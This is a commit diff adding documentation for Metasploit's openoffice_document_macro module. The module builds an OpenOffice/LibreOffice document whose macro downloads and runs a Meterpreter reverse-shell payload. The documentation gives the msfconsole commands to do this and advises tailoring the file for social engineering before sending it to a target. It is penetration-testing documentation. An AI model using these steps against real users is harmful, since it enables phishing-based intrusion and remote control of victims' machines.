Add doc for openoffice_document_macro
wchen-r7
parent
047a9b17cf
commit
3e2e15c7b8
|
|
@ -0,0 +1,59 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also
|
||||||
|
works against LibreOffice.
|
||||||
|
|
||||||
|
For exploit successfully, the targeted user must adjust the security level in Macro Security to
|
||||||
|
either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the
|
||||||
|
macro. If set to Low, the macro can automatically run without any warning.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
* Apache OpenOffice
|
||||||
|
* LibreOffice
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
To use this exploit, you must know the platform of the targeted user. The module supports either
|
||||||
|
Windows, Linux, and OSX. If the target is using Windows, then the exploit will generate the macro
|
||||||
|
with malicious Powershell code inside. For other supported platforms, the exploit will generate
|
||||||
|
Python code.
|
||||||
|
|
||||||
|
An example of using this module against Windows:
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. ```use exploit/multi/misc/openoffice_document_macro```
|
||||||
|
3. ```set target 0```
|
||||||
|
4. ```set payload windows/meterpreter/reverse_tcp```
|
||||||
|
5. ```exploit```
|
||||||
|
|
||||||
|
An example of using this module against Linux or OSX:
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. ```use exploit/multi/misc/openoffice_document_macro```
|
||||||
|
3. ```set target 1```
|
||||||
|
4. ```set payload python/meterpreter/reverse_tcp```
|
||||||
|
5. ```exploit```
|
||||||
|
|
||||||
|
Once started, the module will mainly do these things:
|
||||||
|
|
||||||
|
1. It will start a payload handler.
|
||||||
|
2. It will start a web server. This is used for the macro to download and execute our final payload.
|
||||||
|
3. The malicious odt file. Send this to your targeted user.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**BODY**
|
||||||
|
|
||||||
|
This option can be used to insert text to the malicious document.
|
||||||
|
|
||||||
|
## Modification
|
||||||
|
|
||||||
|
Since social engineering will play a big part in the success of the attack, you will most likely
|
||||||
|
want to modify the odt file.
|
||||||
|
|
||||||
|
1. To do so, first use msfconsole to generate the malicious odt file.
|
||||||
|
2. Move the odt file to a system that has OpenOffice or LibreOffice
|
||||||
|
3. You can just use OpenOffice/LibreOffice to edit the file. Make sure you don't modify the macro
|
||||||
|
code unless you actually know what you're doing.
|
||||||
|
|
||||||
Loading…
Reference in New Issue